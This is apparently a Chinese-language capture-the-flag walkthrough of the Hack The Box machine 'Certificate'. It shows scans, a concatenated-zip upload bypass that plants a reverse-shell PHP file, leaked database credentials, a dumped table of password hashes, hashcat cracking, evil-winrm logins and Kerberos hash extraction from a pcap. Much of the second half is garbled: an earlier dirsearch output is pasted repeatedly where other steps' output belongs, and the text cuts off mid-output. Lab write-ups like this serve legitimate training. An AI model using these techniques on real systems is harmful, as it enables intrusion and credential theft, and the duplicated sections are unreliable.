信息收集
nmap
端口探测
➜ Certificate nmap --min-rate 10000 -A -p- 10.10.11.71Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-09 20:49 CSTNmap scan report for 10.10.11.71Host is up (0.30s latency).Not shown: 65519 filtered tcp ports (no-response)PORT STATE SERVICE VERSION53/tcp open domain (generic dns response: SERVFAIL)| fingerprint-strings: | DNSVersionBindReqTCP: | version|_ bind80/tcp open tcpwrapped|_http-title: Did not follow redirect to http://certificate.htb/|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.3088/tcp open tcpwrapped135/tcp open tcpwrapped139/tcp open tcpwrapped445/tcp open tcpwrapped593/tcp open tcpwrapped636/tcp open tcpwrapped| ssl-cert: Subject: commonName=DC01.certificate.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb| Not valid before: 2024-11-04T03:14:54|_Not valid after: 2025-11-04T03:14:54|_ssl-date: 2025-06-09T20:29:06+00:00; +7h38m17s from scanner time.3268/tcp open tcpwrapped3269/tcp open tcpwrapped|_ssl-date: 2025-06-09T20:29:03+00:00; +7h38m18s from scanner time.| ssl-cert: Subject: commonName=DC01.certificate.htb| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb| Not valid before: 2024-11-04T03:14:54|_Not valid after: 2025-11-04T03:14:549389/tcp open tcpwrapped49667/tcp open tcpwrapped49692/tcp open tcpwrapped49693/tcp open tcpwrapped49712/tcp open tcpwrapped49718/tcp open tcpwrappeddirsearch
目录搜集
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/有upload.php页面,但是无法直接访问。有注册和登录页面。
注册一个号,登录进去寻找功能点。
80端口 - upload
可以在底部看到使用的模板或者主题是Colorlib,可以尝试搜索且寻找CVE
注册登录进来,寻找功能点,在这里课程里面,可以看到这个Enroll功能,点击这个之后,下面会有Submit
点击Submit会跳转到http://certificate.htb/upload.php?s_id=5进行提交作业文件(上传)。
这里根据提示,只能上传
尝试上传php文件,不成功
学习到了一个新东西
https://github.com/snyk/zip-slip-vulnerability
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
➜ Certificate lsreports reverse test.pdf➜ Certificate ls -al reverse # reverse目录下存放 反弹shell的木马总计 12drwxrwxr-x 2 yefeng yefeng 4096 6月10日 22:39 .drwxrwxr-x 4 yefeng yefeng 4096 6月10日 22:40 ..-rw-rw-r-- 1 yefeng yefeng 2585 6月10日 22:38 reverse.php➜ Certificate zip test.zip test.pdf # 压缩一个无害的zip文件,里面随便放一个文件 adding: test.pdf (deflated 98%)➜ Certificate zip -r shell.zip reverse # 压缩那个存放木马的文件夹 adding: reverse/ (stored 0%) adding: reverse/reverse.php (deflated 60%)➜ Certificate cat test.zip shell.zip > final.zip # 将无害的zip和有害的zip 先后压缩在 最后的zip中➜ Certificate ls final.zip reports reverse shell.zip test.pdf test.zip上传final压缩包,上传成功,可以点击here
跳转到了这个路径,根据我们刚才压缩的进行访问,同时要进行监听
http://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/test.pdfhttp://certificate.htb/static/uploads/7af21a959d787f761b08dac295577bdd/reverse/reverse.phpshell -> Sara.b -> information
寻找信息,看到了db.php,在前面的dirsearch中也扫描到了该文件。进行查看,泄露了数据库账号密码
PS C:xampphtdocscertificate.htb> ls Directory: C:xampphtdocscertificate.htbMode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/26/2024 1:49 AM static -a---- 12/24/2024 12:45 AM 7179 about.php -a---- 12/30/2024 1:50 PM 17197 blog.php -a---- 12/30/2024 2:02 PM 6560 contacts.php -a---- 12/24/2024 6:10 AM 15381 course-details.php -a---- 12/24/2024 12:53 AM 4632 courses.php -a---- 12/23/2024 4:46 AM 549 db.php -a---- 12/22/2024 10:07 AM 1647 feature-area-2.php -a---- 12/22/2024 10:22 AM 1331 feature-area.php -a---- 12/22/2024 10:16 AM 2955 footer.php -a---- 12/23/2024 5:13 AM 2351 header.php -a---- 12/24/2024 12:52 AM 9497 index.php -a---- 12/25/2024 1:34 PM 5908 login.php -a---- 12/23/2024 5:14 AM 153 logout.php -a---- 12/24/2024 1:27 AM 5321 popular-courses-area.php -a---- 12/25/2024 1:27 PM 8240 register.php -a---- 12/28/2024 11:26 PM 10366 upload.php PS C:xampphtdocscertificate.htb> type db.php<?php// Database connection using PDOtry { $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4'; $db_user = 'certificate_webapp_user'; // Change to your DB username $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password $options = [ PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION, PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC, ]; $pdo = new PDO($dsn, $db_user, $db_passwd, $options);} catch (PDOException $e) { die('Database connection failed: ' . $e->getMessage());}?>想办法连接,这个 xampp目录 -> 免费开源软件包,发现其中有mysql.exe
通过-e参数执行数据库查询命令,且结果返回在终端,-E以垂直显示,排版整齐。
PS C:xamppmysqlbin> .mysql.exe -u certificate_webapp_user -p"cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users;" -E *************************** 1. row *************************** id: 1 first_name: Lorra last_name: Armessa username: Lorra.AAA email: [email protected] password: $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFGcreated_at: 2024-12-23 12:43:10 role: teacher is_active: 1*************************** 2. row *************************** id: 6first_name: Sara last_name: Laracrof username: Sara1200 email: [email protected] password: $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkKcreated_at: 2024-12-23 12:47:11 role: teacher is_active: 1*************************** 3. row *************************** id: 7first_name: John last_name: Wood username: Johney email: [email protected] password: $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRqcreated_at: 2024-12-23 13:18:18 role: student is_active: 1*************************** 4. row *************************** id: 8first_name: Havok last_name: Watterson username: havokww email: [email protected] password: $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nticreated_at: 2024-12-24 09:08:04 role: teacher is_active: 1*************************** 5. row *************************** id: 9first_name: Steven last_name: Roman username: stev email: [email protected] password: $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2created_at: 2024-12-24 12:05:05 role: student is_active: 1*************************** 6. row *************************** id: 10first_name: Sara last_name: Brawn username: sara.b email: [email protected] password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6created_at: 2024-12-25 21:31:26 role: admin is_active: 1*************************** 7. row *************************** id: 12first_name: a last_name: a username: test email: [email protected] password: $2y$04$vwe.PPbSkbpE8PUUlTlXUu33rl7SNaDQrbZSomfpknEXtOgxeillycreated_at: 2025-06-12 13:16:01 role: student is_active: 1*************************** 8. row *************************** id: 13first_name: Kali last_name: Kalki username: Kali email: [email protected] password: $2y$04$hfaMKHRnCcSRI04qiWK1auFkdDFhMAaRlPDtH0WfgKZGouda5590Kcreated_at: 2025-06-12 13:18:13 role: student is_active: 1PS C:Users> ls Directory: C:UsersMode LastWriteTime Length Name ---- ------------- ------ ---- d----- 12/30/2024 8:33 PM Administrator d----- 11/23/2024 6:59 PM akeder.kh d----- 11/4/2024 12:55 AM Lion.SK d-r--- 11/3/2024 1:05 AM Public d----- 11/3/2024 7:26 PM Ryan.K d----- 11/26/2024 4:12 PM Sara.B d----- 12/29/2024 5:30 PM xamppuser 有一个Sara.B是存在数据库中的,尝试爆破
hashcat -> Sara.b
username: sara.b email: [email protected] password: $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6➜ Certificate hashcat -m 3200 -a 0 hash /usr/share/wordlists/rockyou.txt --show$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6:Blink182# 可以通过cmb进行验证➜ Certificate crackmapexec winrm 10.10.11.71 -u sara.b -p 'Blink182' SMB 10.10.11.71 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certificate.htb)HTTP 10.10.11.71 5985 DC01 [*] http://10.10.11.71:5985/wsman/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0. arc4 = algorithms.ARC4(self._key)WINRM 10.10.11.71 5985 DC01 [+] certificate.htbsara.b:Blink182 (Pwn3d!)Evil-winrm
➜ Certificate evil-winrm -i dc01.certificate.htb -u sara.b -p 'Blink182'Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module RelineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:UsersSara.BDocuments> whoamicertificatesara.b连上之后,并没有user.txt,说明这个权限还不够,还需要继续移动,需要继续收集信息
发现documents存在东西,里面有WS-01,后面有一个pcap流量文件
*Evil-WinRM* PS C:UsersSara.BDocuments> ls Directory: C:UsersSara.BDocumentsMode LastWriteTime Length Name---- ------------- ------ ----d----- 11/4/2024 12:53 AM WS-01*Evil-WinRM* PS C:UsersSara.BDocuments> cd WS-01*Evil-WinRM* PS C:UsersSara.BDocumentsWS-01> dir Directory: C:UsersSara.BDocumentsWS-01Mode LastWriteTime Length Name---- ------------- ------ -----a---- 11/4/2024 12:44 AM 530 Description.txt-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap*Evil-WinRM* PS C:UsersSara.BDocumentsWS-01> download WS-01_PktMon.pcap .Info: Downloading C:UsersSara.BDocumentsWS-01WS-01_PktMon.pcap to WS-01_PktMon.pcapInfo: Download successful!用wireshark打开,分析,都是些smb2,krb5协议的数据包,身份验证
通过这个项目进行组装哈希值
https://github.com/jalvarezz13/Krb5RoastParser
这里需要手动给域名加上.HTB后缀
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/0hashcat -> Lion.SK
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/1shell -> Lion.SK -> user.txt
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/2该用户就可以得到user.txt了,在桌面的位置。
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - /examples/jsp/index.html[21:27:02] 503 - 404B - /examples/servlet/SnoopServlet[21:27:02] 503 - 404B - /examples/websocket/index.xhtml[21:27:04] 200 - 3KB - /footer.php[21:27:07] 200 - 2KB - /header.php[21:27:10] 403 - 304B - /index.php::$DATA[21:27:15] 200 - 9KB - /login.php[21:27:16] 302 - 0B - /logout.php -> login.php[21:27:28] 403 - 423B - /phpmyadmin[21:27:30] 403 - 423B - /phpmyadmin/[21:27:30] 403 - 423B - /phpmyadmin/docs/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/ChangeLog[21:27:30] 403 - 423B - /phpmyadmin/phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/doc/html/index.html[21:27:30] 403 - 423B - /phpmyadmin/index.php[21:27:30] 403 - 423B - /phpmyadmin/README[21:27:30] 403 - 423B - /phpmyadmin/scripts/setup.php[21:27:35] 200 - 11KB - /register.php[21:27:37] 403 - 423B - /server-info[21:27:37] 403 - 423B - /server-status/[21:27:38] 403 - 423B - /server-status[21:27:42] 301 - 343B - /static -> http://certificate.htb/static/[21:27:42] 301 - 345B - /static.. -> http://certificate.htb/static../[21:27:50] 403 - 304B - /Trace.axd::$DATA[21:27:51] 302 - 0B - /upload.php -> login.php[21:27:56] 403 - 304B - /web.config::$DATA[21:27:56] 403 - 304B - /webalizer[21:27:56] 403 - 304B - /webalizer/3BloodHound
通过bloodhound收集信息
➜ Certificate dirsearch -u http://certificate.htb/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /home/yefeng/桌面/HTB/Certificate/reports/http_certificate.htb/__25-06-10_21-25-58.txtTarget: http://certificate.htb/[21:25:58] Starting: [21:26:02] 403 - 304B - /%C0%AE%C0%AE%C0%AF[21:26:02] 403 - 304B - /%3f/[21:26:02] 403 - 304B - /%ff[21:26:08] 403 - 304B - /.ht_wsr.txt[21:26:08] 403 - 304B - /.htaccess.bak1[21:26:08] 403 - 304B - /.htaccess.orig[21:26:08] 403 - 304B - /.htaccess.save[21:26:08] 403 - 304B - /.htaccess.sample[21:26:08] 403 - 304B - /.htaccess_sc[21:26:08] 403 - 304B - /.htaccess_orig[21:26:08] 403 - 304B - /.htaccessOLD[21:26:08] 403 - 304B - /.htaccess_extra[21:26:08] 403 - 304B - /.htaccessBAK[21:26:08] 403 - 304B - /.htaccessOLD2[21:26:08] 403 - 304B - /.htm[21:26:08] 403 - 304B - /.html[21:26:08] 403 - 304B - /.htpasswd_test[21:26:08] 403 - 304B - /.httr-oauth[21:26:08] 403 - 304B - /.htpasswds[21:26:24] 200 - 14KB - /about.php[21:26:49] 403 - 304B - /cgi-bin/[21:26:49] 500 - 638B - /cgi-bin/printenv.pl[21:26:56] 200 - 0B - /db.php[21:27:02] 503 - 404B - /examples[21:27:02] 503 - 404B - /examples/jsp/%252e%252e/%252e%252e/manager/html/[21:27:02] 503 - 404B - /examples/[21:27:02] 503 - 404B - /examples/servlets/servlet/CookieExample[21:27:02] 503 - 404B - /examples/jsp/snp/snoop.jsp[21:27:02] 503 - 404B - /examples/servlets/servlet/RequestHeaderExample[21:27:02] 503 - 404B - /examples/servlets/index.html[21:27:02] 503 - 404B - 